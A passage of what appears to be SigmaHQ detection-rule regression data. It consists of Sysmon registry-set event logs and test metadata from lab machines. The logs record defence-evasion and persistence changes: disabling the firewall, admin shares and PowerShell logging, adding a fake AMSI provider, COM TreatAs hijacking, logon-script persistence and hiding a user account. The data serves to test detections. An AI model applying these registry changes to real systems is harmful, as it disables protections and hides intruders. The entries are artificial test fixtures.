(0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:29:32.296086Z\"\n        }\n      },\n      \"EventRecordID\": 28656618,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:29:32.287\",\n      \"ProcessGuid\": \"5AA13A44-688C-68FE-D656-000000004002\",\n      \"ProcessId\": 368,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\AutoShareWks\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml",
    "content": "id: c99b67cd-0a57-4023-9f88-35806d622b48\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e\n      title: Disable Administrative Share Creation at Startup\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:36:31.269411Z\"\n        }\n      },\n      \"EventRecordID\": 28785637,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:36:31.258\",\n      \"ProcessGuid\": \"5AA13A44-6A2F-68FE-0857-000000004002\",\n      \"ProcessId\": 9720,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\PublicProfile\\\\EnableFirewall\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml",
    "content": "id: aa89a142-e72f-4b37-acd2-274ed81a1477\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 974515da-6cc5-4c95-ae65-f97f9150ec7f\n      title: Disable Microsoft Defender Firewall via Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:42:48.447971Z\"\n        }\n      },\n      \"EventRecordID\": 28901143,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:42:48.434\",\n      \"ProcessGuid\": \"5AA13A44-6BA8-68FE-2F57-000000004002\",\n      \"ProcessId\": 7476,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml",
    "content": "id: b5d83cd8-e1e5-459e-9f06-7c1e41a9bfeb\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6\n      title: Disable Windows Security Center Notifications\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:49:35.941239Z\"\n        }\n      },\n      \"EventRecordID\": 16380977,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:49:35.941\",\n      \"ProcessGuid\": \"5AA13A44-620F-68FD-9A3E-000000004002\",\n      \"ProcessId\": 9952,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\regsvr32.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\{00000000-DEAD-DEAD-DEAD-B2B2E0859059}\\\\(Default)\",\n      \"Details\": \"FakeAmsi\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml",
    "content": "id: 825fc38f-ff54-4338-8016-6f3477c7aa8f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705\n      title: Potential Persistence Via New AMSI Providers - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:53:11.117530Z\"\n        }\n      },\n      \"EventRecordID\": 16447792,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:53:11.114\",\n      \"ProcessGuid\": \"5AA13A44-62E7-68FD-C13E-000000004002\",\n      \"ProcessId\": 8536,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\\\CLSID\\\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\\\TreatAs\\\\(Default)\",\n      \"Details\": \"{00000001-0000-0000-0000-0000FEEDACDC}\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml",
    "content": "id: 482ef6c8-3c2a-4b7b-a82e-b09f27576b96\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9b0f8a61-91b2-464f-aceb-0527e0a45020\n      title: Potential COM Object Hijacking Via TreatAs Subkey - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:56:33.715505Z\"\n        }\n      },\n      \"EventRecordID\": 16510574,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:56:33.705\",\n      \"ProcessGuid\": \"5AA13A44-63B1-68FD-D93E-000000004002\",\n      \"ProcessId\": 9452,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Environment\\\\UserInitMprLogonScript\",\n      \"Details\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\art.bat\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml",
    "content": "id: 84c6a082-3aa5-4387-b113-60415aeb9458\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9ace0707-b560-49b8-b6ca-5148b42f39fb\n      title: Potential Persistence Via Logon Scripts - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-31T05:57:54.388692Z\"\n        }\n      },\n      \"EventRecordID\": 657715,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3080,\n          \"ThreadID\": 4948\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-31 05:57:54.387\",\n      \"ProcessGuid\": \"14207D89-4FE2-6904-D207-000000004002\",\n      \"ProcessId\": 5612,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-1938467512-983293709-721003795-1103\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml",
    "content": "id: a6c567e7-d5d4-494b-9a66-71fa87c44f8e\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7\n      title: PowerShell Logging Disabled Via Registry Key Tampering\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:59:35.308812Z\"\n        }\n      },\n      \"EventRecordID\": 16567695,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:59:35.300\",\n      \"ProcessGuid\": \"5AA13A44-6465-68FD-EF3E-000000004002\",\n      \"ProcessId\": 7500,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\PsService.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Sysinternals\\\\PsService\\\\EulaAccepted\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml",
    "content": "id: 070ba0e3-b1e5-4fa9-9935-ca8a8c233b3d\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      title: PUA - Sysinternal Tool Execution - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T00:00:51.970813Z\"\n        }\n      },\n      \"EventRecordID\": 16592206,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 00:00:51.957\",\n      \"ProcessGuid\": \"5AA13A44-64B2-68FD-FB3E-000000004002\",\n      \"ProcessId\": 4776,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\FakeSysinternals.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Sysinternals\\\\PsService\\\\EulaAccepted\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml",
    "content": "id: a977324d-5006-46e6-bb1c-9d8b13344f00\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: f50f3c09-557d-492d-81db-9064a8d4e211\n      title: Suspicious Execution Of Renamed Sysinternals Tools - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:59:35.308812Z\"\n        }\n      },\n      \"EventRecordID\": 16567695,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:59:35.300\",\n      \"ProcessGuid\": \"5AA13A44-6465-68FD-EF3E-000000004002\",\n      \"ProcessId\": 7500,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\PsService.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Sysinternals\\\\PsService\\\\EulaAccepted\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml",
    "content": "id: 55e4036d-e026-4110-bf9a-a1037f28edbb\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d\n      title: PUA - Sysinternals Tools Execution - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-31T05:06:45.377630Z\"\n        }\n      },\n      \"EventRecordID\": 657154,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3080,\n          \"ThreadID\": 4948\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-31 05:06:45.377\",\n      \"ProcessGuid\": \"14207D89-43E5-6904-4506-000000004002\",\n      \"ProcessId\": 5244,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist\\\\AtomicOperator$\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/info.yml",
    "content": "id: 3c14b160-a7f5-49a4-beb2-575b70f599b9\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd\n      title: Hiding User Account Via SpecialAccounts Registry Key\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-05T06:29:01.086253Z\"\n        }\n      },\n      \"EventRecordID\": 74886,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3636,\n          \"ThreadID\": 4340\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2026-01-05 06:29:01.070\",\n      \"ProcessGuid\": \"0197231E-7211-694F-D001-000000000C00\",\n      \"ProcessId\": 9524,\n      \"Image\": \"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": 